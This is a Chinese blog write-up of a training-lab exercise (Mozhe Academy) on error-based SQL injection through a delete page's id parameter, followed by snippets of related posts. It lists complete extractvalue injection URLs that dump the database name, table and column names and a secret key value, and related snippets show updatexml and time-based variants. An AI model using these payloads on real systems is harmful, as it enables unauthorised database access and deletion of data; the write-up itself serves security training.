SQL注入漏洞测试(delete注入)

最新推荐文章于 2024-08-30 17:10:29 发布
最新推荐文章于 2024-08-30 17:10:29 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: web 文章标签: sql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52718293/article/details/121843859
版权

*首先关于报错型注入可以参考一下*文章了解
delecte注入的多种方法
这题我使用的是extractvalue函数
在这里插入图片描述
从此可以知道注入点在删除页面的url链接的id参数中,可由报错注入来爆库

1.爆库 (pikaqiu)
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select database())))
在这里插入图片描述

2.爆表名(message)
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select group_concat(table_name) from information_schema.tables where table_schema=‘pikaqiu’)))
在这里插入图片描述

3.爆字段名
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,(select group_concat(column_name) from information_schema.columns where table_name=‘message’)))
在这里插入图片描述
4.爆字段内容
a.由于报错内容回显只能回显32位,而"~"占了一个字符,所以爆出来的key值是少1位的,知道原因后就有很多处理方法了,可以有right()方法

b.由于key是保留字段,要用单引号括住,否则会报错

c.由于这题是请求删除的url,如果之前你请求id为61~65,因为墨者服务器数据库里面存的key的数据在这个范围(但没精确到是哪个),当前面注入成功的时候也会删除对应id的key内容,导致最后出现爆字段key值的时候,很多评论会有key值为空的情况。如果遇到这种情况,可重启环境再爆字段。

and extractvalue(1,concat(’~’,(select group_concat(key) from message)))
在这里插入图片描述
http://219.153.49.228:48577/sqli_del.php?id=666 and extractvalue(1,concat(’~’,right((select group_concat(key) from message),32)))
在这里插入图片描述
方法二:sqlmap
在这里插入图片描述
在这里插入图片描述

*小瑶
关注
专栏目录
26-1 SQL 注入攻击 - delete注入
weixin_43263566的博客
03-10 433
因为靶场的源码没有对这个传入的id做过滤,所以这个位置存在注入点,我们先将抓到的删除请求发送到重发器,然后在id后面加上反斜杠再次删除,就会出现sql的错误提示。在 SQL 注入攻击中,常常使用这种方式来构造恶意条件,以绕过原有的查询逻辑。如果后台没有对接收到的 id 参数进行充分的验证和过滤,恶意用户可能会利用这一点进行注入攻击。对于后台来说,delete操作通常是将对应的id传递到后台,然后后台会删除该id对应的数据。: 这是 SQL 中的注释符号,表示后面的内容都是注释,不会被执行。
漏洞挖掘】——126、Delete注入刨析
Fly_鹏程万里
06-28 180
Delete注入注入点在DeleteSQL语句中,例如:以下语句用于向指定的数据表删除数据信息,如果此处的id值来自用户且未经过滤处理,则存在SQL注入攻击风险。
delete注入
Ethan024的博客
03-30 1012
delete注入 实验环境: 皮卡丘平台—delete注入 原理: if(array_key_exists(‘id’, $_GET)){ KaTeX parse error: Expected '}', got 'EOF' at end of input: …ge where id = {$_GET[‘id’]}"; …} 要在’id’出构造闭合 实验步骤: 可以看到此时有一条留言: 删除该留言并且用Burpsuite抓包,并发送到repeater中: 设计payload:1 or updatexml
关于springboot的Rest请求映射处理的源码分析(一)
最新发布
liuwenqiang1314的博客
08-30 1103
我们看到在put和delete请求的时候,出现了我们预想之外的结果。这个不对,难道是我们有没考虑到的问题吗。
【墨者学院】SQL注入漏洞测试(delete注入)
weixin_43884770的博客
12-04 1867
**背景介绍** 最近有人匿名给工程师留言说,感谢他的辛勤付出,把墨者学院建设的这么好,不料激发了工程师对留言板的一波操作,轻松查到了这个人的身份。 **实训目标** 1、熟练掌握留言板的工作原理; 2、善用burp抓取数据包; **解题方向** 抓取数据包加以分析。
墨者SQL注入漏洞测试(delete注入)
zr1213159840的博客
12-14 466
这题是看了别人的思路才知道的,还是要多加学习呀。 首先是界面点进去后,点击留言发现会留言在界面上,我一直以为这个框子存在注入。结果不是的。 正确的姿势是留言后点击鼠标放在删除按钮上会在左下角出现删除的链接,其实想想也是,写入应该是insert注入才对啊。 那么我们是可以直接在链接上进行测试的 id=1 and 1=1--+ 试试 1=1和1=2测试后,发现是存在注入的,那么我们就从报错开始。 id=1 and (updatexml(1,concat(0x7e,(select database()),0
自己动手编写SQL注入漏洞扫描器C#源代码
03-16
本主题将深入探讨如何使用C#编程语言编写一个SQL注入漏洞扫描器,旨在帮助开发者理解和预防这类威胁。 首先,我们需要理解SQL注入的基本概念。SQL注入是攻击者通过输入恶意的SQL代码,欺骗数据库服务器执行非预期的...
Sql注入漏洞汇总-上
黑战士的博客
06-04 735
DNSlog注入,也叫DNS带外查询,它是属于带外通信的一种(Out of Band,简称OOB)。寻常的注入基本都是在同一个信道上面的,比如正常的get注入,先在url上插入payload做HTTP请求,然后得到HTTP返回包,没有涉及其他信道。而所谓的带外通信,至少涉及两个信道信道:在计算机中指通信的通道,是信号传输的媒介。
4、delete注入
weixin_51520483的博客
05-17 336
1、在某些传递不了参数,也有存在注入的,要通过抓包的进行注入1、inset、update、delete注入方式跟selec注入方式区别在于,这是一个操作,不是一个联合查 询,所以需要用报错方式或许信息2、当以抓取数据包形式插入payload时,要对插入的payload进行url编码3、在某些情况下,空格也可能被编码为%20。这是因为在某些URL编码标准中,符号也被视为特殊字符,因此为了避免混淆,有些系统或库可能会选择使用%20来编码空格。
SQL注入漏洞测试(delete注入)——<墨者学院漏洞记录>
chick11的博客
07-16 414
1、 打开链接界面,可以自行测试留言 2、 提交留言,查看网页源代码 3、在浏览器中自行添加后缀,并使用单引号测试注入点,发现存在报错行注入,报错型注入的方法大概有10种左右,这里分别使用floor、updatexml和extractvalue三种常用的方法。 4、 使用extractvalue注入方法获取当前数据库信息 注入语句: and (extractvalue(1, concat(0x5c,(select database())))) 报错反馈得出数据库名称为
2021-07-08 CTFer成长之路-SQL注入-DELETE注入
热门推荐
时光隧道
07-08 5万+
一:DELETE注入 语法:delect from wp_news where id = {$_GET['id']} 为了保证不会对正常数据造成干扰,通常使用’and sleep(1)'的方式保证WHERE后的结果返回为False,让语句无法成功执行,见图1-2-43。后续步骤与时间盲注的一致,这里不再赘述。 ...
SQL注入测试平台 SQLol -5.DELETE注入测试
05-26 511
  访问首页的delete模块,http://127.0.0.1/sql/delete.php,开始对delete模块进行测试delete语法: DELETE FROM 【users】 WHERE 【username】 = 【'1'】    几个位置都可能存在注入,这里只演示一种。 下面演示注入到不同位置的方法。   一、String in WHERE clause 构造P...
0x36.SQL注入漏洞测试(delete注入)
qq_31679787的博客
12-10 295
抓包后发现存在id; 直接使用sqlmap进行爆数据; 得到key;
1-4.Delete注入逻辑
山兔的博客
12-10 800
实战演示 我们首先打开kali的终端 输入mysql -uroot,当中在输入hxf数据库名,这样子就可以直接链接到hxf数据库。mysql -uroot hxf 我们可以通过show tables;看一下当前所具有的表名 我们看一下users,这是我们上一篇文章所留下来的,我们看一下它的内容。select * from users; 一共有7行 我们现在要拷贝一张表跟users表的内容是一样的,我们可以create table这个表名叫users2,as select * from users这样
SQL注入_insert&delete&update&selete
weixin_48131633的博客
10-26 5172
SQL注入_insert&delete&update&selete
SQL注入】UPDATE、insert、delete注入
07-08 3512
SQL注入
SQL注入(三):delete+http header
NSQ0207的博客
07-19 162
http header注入 使用 ' 判断哪里存在sql注入 测试,使用 ' ' 发现成功 使用order by 判段是否为select查询,如果不是则使用updatexml admin'orupdatexml(2,concat(0x7e,(version())),0)or'
深入理解SQL注入漏洞:原理与防范
"本文主要探讨了SQL注入漏洞的原理,并提供了相关的示例来说明其危害和常见表现形式。SQL注入是一种常见的网络安全问题,攻击者通过构造恶意的SQL语句,利用应用程序的不当处理,可以执行非授权的数据库操作,获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值